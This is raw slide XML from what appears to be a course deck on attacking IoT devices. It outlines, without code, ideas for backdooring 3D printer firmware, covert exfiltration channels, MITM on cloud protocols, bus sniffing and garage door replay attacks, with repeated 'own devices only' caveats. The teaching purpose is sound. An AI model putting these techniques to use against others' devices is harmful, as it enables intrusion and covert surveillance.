                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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7C5B4D06-F07C-C446-888D-D84C096F96B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="610880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81" y="315662"/>
            <a:ext cx="11838639" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use 3D printer backdoor to target a specific part build</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2183235"/>
            <a:ext cx="11582400" cy="4355677"/>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You will often have physical access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Find the printer firmware, modify it and download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Don’t do this to other people’s equipment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{143D2A3A-1D9D-7848-8038-0ABEC3801A63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12212946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1315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10,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data based attacks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DD91B6B-CC82-F54E-BF9E-D25E491EC4DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8609675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422" y="354868"/>
            <a:ext cx="10913155" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Collect common sensor readings and predict events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2396836"/>
            <a:ext cx="11582400" cy="410629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This is really green field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can collect tons of IoT data: location, user connections and even temperature to learn lots of stuff.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Use the techniques in the data collection section if you want to be fancy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Don’t collect other’s data without permission.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09CBE99-B8CA-AB47-B01D-21DC547D07E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3197561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1315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11,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Frameworks and cloud management</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7DA15A-10D1-124C-9F69-91BA8BF28072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38748804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1315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12,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Attacking consumer devics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DE50019-5EFA-6D4D-B667-30A3670F52C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409346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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1884222"/>
            <a:ext cx="11611076" cy="4823402"/>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Here’s the one I broke:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HD Camera GK7101 + SONY IMX322:  GK7102 is a HD IP camera SoC which offers 960P@30fps or 720P@30fps video encoding with H.264 multi-stream encoding capabilities. </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CPU core: ARM1176 @ 600MHZ, 16KB I-Cache, 16KB D-Cache</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High integration: Integrated 512Mb DDR2, Ethernet PHY, Audio Codec, MCU, eFuse</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Image processing: 3A, WDR, 3D noise reduction, γ conversion, RGB filter, dead pixel correction, black level correction, lens positive survey</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Video: Supports H.264 BP / MP / HP, MJPEG / JPEG</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Audio: Supports G.711 / G.726 / ADPCM / MP3</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Low Power: 800mw (including DDR), true standby function: System standby current 60uA</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AES, DES, 3DES security engine (!!!!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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1.3MP HD Camera GK7102 + AR0130</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4ECBC217-6ACC-C94C-B7BC-6DB6D6CAFE0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25884186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70" y="0"/>
            <a:ext cx="11883860"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consumer IoT device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2090058"/>
            <a:ext cx="11582400" cy="3773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Almost all consumer IoT devices are controlled by cloud management systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>See Giese,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https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Reversing-IoT-Xiaomi-ecosystem.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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This describes a commercial cloud protocol and outlines a way to subvert it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Scared yet?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40BDBEE4-FBAD-D44A-8825-98D9FCE717A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40867063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291" y="136525"/>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Develop a surreptitious channel from consumer IoT device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="2299855"/>
            <a:ext cx="11582400" cy="314498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Then don’t use it on other people.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You could send data via Zigbee or Bluetooth or via an optical link to a nearby device you control which is hard to detect “on-net.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09D68E3-001D-D848-843E-AFACAE7C0D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38191794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2" y="52474"/>
            <a:ext cx="11915876" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Develop channel from consumer IoT appliance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="2549236"/>
            <a:ext cx="11582400" cy="398967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What can you learn?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can do this, for example, with the MITM attack described earlier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Do this ONLY with user permission (or on your devices).  It may be illegal otherwise.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD6538F-ADBE-D543-A67A-01FACDAAE041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24752461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42" y="136525"/>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Develop a hardware sniffer on some interface or subsystem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2078182"/>
            <a:ext cx="11582400" cy="442495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Snoop the bus, or, for extra credit, an RF side channel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Your stuff only, again.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2529F662-D218-0F44-BEF7-7511E6F49800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19573849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291" y="0"/>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Fingerprint an IoT based emitter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2064326"/>
            <a:ext cx="11582400" cy="4438805"/>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Use your SDR or a spectrum analyzer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Most emitters can be precisely characterized by their emissions even if they are mass market.  See Introduction to Electronic Warfare references.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC231AD2-D09F-E343-9A0A-E377C5C0536F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36045002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254" y="720974"/>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13,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RF attacks on commercial devices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BAB60C4-2FC7-3940-B9C3-4625BB052383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31577505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501" y="216320"/>
            <a:ext cx="11287683" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use an SDR to subvert a garage door opening system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482140" y="2286000"/>
            <a:ext cx="11086407" cy="435568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Look for info on the FCC website for info on your garage door.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Most Garage door openers are incredibly insecure.  A simple replay attack works.</a:t>
